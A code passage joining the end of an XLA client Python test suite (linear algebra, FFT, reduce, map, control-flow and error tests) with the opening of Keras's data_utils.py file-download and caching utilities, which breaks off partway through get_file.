np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testEigh(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
a = (a + a.T) / 2
c = self._NewComputation()
c.Eigh(c.Constant(a), full_matrices=True)
# TODO(b/129396575): Turn this test back on when it passes without fastmath.
# v, w = self._Execute(c, ())
# self.assertLess(np.linalg.norm(np.dot(a, v) - w * v), 1e-3)
def testSVD(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.SVD(c.Constant(a))
u, d, v = self._Execute(c, ())
self.assertLess(np.linalg.norm(a - np.matmul(u * d, v.T)), 1e-3)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(
c.Constant(a_vals),
c.Constant(b_vals),
left_side=False,
lower=True,
transpose_a=True)
self._ExecuteAndCompareClose(
c,
expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
],
dtype=np.float32),
rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.fftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# IFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.ifftn(a, axes=(1, 2, 3)),
rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
c.Fft(c.Constant(b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(c, expected=np.fft.rfftn(b, axes=(1, 2, 3)),
rtol=1e-4)
# IRFFT
c = self._NewComputation()
c.Fft(c.Constant(a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(c, expected=np.fft.irfftn(a, axes=(1, 2, 3)),
rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(
c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegexp(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
absltest.main()
|
data_utils.py
|
# Lint as python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
import tensorflow.compat.v2 as tf
from abc import abstractmethod
from contextlib import closing
import functools
import hashlib
import multiprocessing.dummy
import os
import pathlib
import queue
import random
import shutil
import tarfile
import threading
import time
import typing
import urllib
import weakref
import zipfile
from six.moves.urllib.parse import urlsplit
import numpy as np
from six.moves.urllib.request import urlopen
from keras.utils import tf_inspect
from keras.utils.generic_utils import Progbar
from keras.utils import io_utils
from tensorflow.python.util.tf_export import keras_export
# Required to support google internal urlretrieve
if True: # This gets transformed to `if sys.version_info[0] == 2:` in OSS. # pylint: disable=using-constant-test
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrieve` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Args:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once on establishment of
the network connection and once after each block read thereafter. The
hook will be passed three arguments; a count of blocks transferred so
far, a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from urllib.request import urlretrieve # pylint: disable=g-importing-member
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
builtin_iterators = (str, list, tuple, dict, set, frozenset)
if isinstance(x, (tf.Tensor, np.ndarray) + builtin_iterators):
return False
return (tf_inspect.isgenerator(x) or
isinstance(x, Sequence) or
isinstance(x, typing.Iterator))
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Args:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, str):
archive_format = [archive_format]
file_path = io_utils.path_to_string(file_path)
path = io_utils.path_to_string(path)
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@keras_export('keras.utils.get_file')
def get_file(fname=None,
origin=None,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Example:
```python
path_to_downloaded_file = tf.keras.utils.get_file(
"flower_photos",
"https://storage.googleapis.com/download.tensorflow.org/example_images/flower_photos.tgz",
untar=True)
```
Args:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location. If `None`, the
name of the file at `origin` will be used.
origin: Original URL of the file.
untar: Deprecated in favor of `extract` argument.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of `file_hash` argument.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are `'md5'`, `'sha256'`, and `'auto'`.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are `'auto'`, `'tar'`, `'zip'`, and `None`.
`'tar'` includes tar, tar.gz, and tar.bz files.
The default `'auto'` corresponds to `['tar', 'zip']`.
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the default directory `~/.keras/`.
Returns:
Path to the downloaded file
"""
if origin is None:
raise ValueError('Please specify the "origin" argument (URL of the file '
'to download).')
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
_makedirs_exist_ok(datadir)
fname = io_utils.path_to_string(fname)
if not fname:
fname = os.path.basename(urlsplit(origin).path)
if not fname:
raise ValueError(
f"Can't parse the file name from the origin provided: '{origin}'."
"Please specify the `fname` as the input param.")
if untar:
if fname.endswith('.tar.gz'):
fname = pathlib.Path(fname)
# The 2 `.with_suffix()` are because of `.tar.gz` as pathlib
# considers it as 2 suffixes.
fname = fname.with_suffix('').with_suffix('')
fname = str(fname)
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
io_utils.print_msg(
'A local file was found, but it seems to be '
f'incomplete or outdated because the {hash_algorithm} '
f'file hash does not match the original value of {file_hash} '
'so we will re-download the data.')
download = True
else:
download = True
if download:
io_utils.print_msg(f'Downloading data from {origin}')
class DLProgbar:
"""Manage progress bar state for use in urlretrieve."""
def __init__(self):
self.progbar = None
self.finished = False
def __call__(self, block_num, block_size, total_size):
if not self.progbar:
if total_size == -1:
total_size = None
self.progbar = Progbar(total_size)
current = block_num * block_size
if current < total_size:
self.progbar.update(current)
elif not self.finished:
self.progbar.update(self.progbar.target)
self.finished = True
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
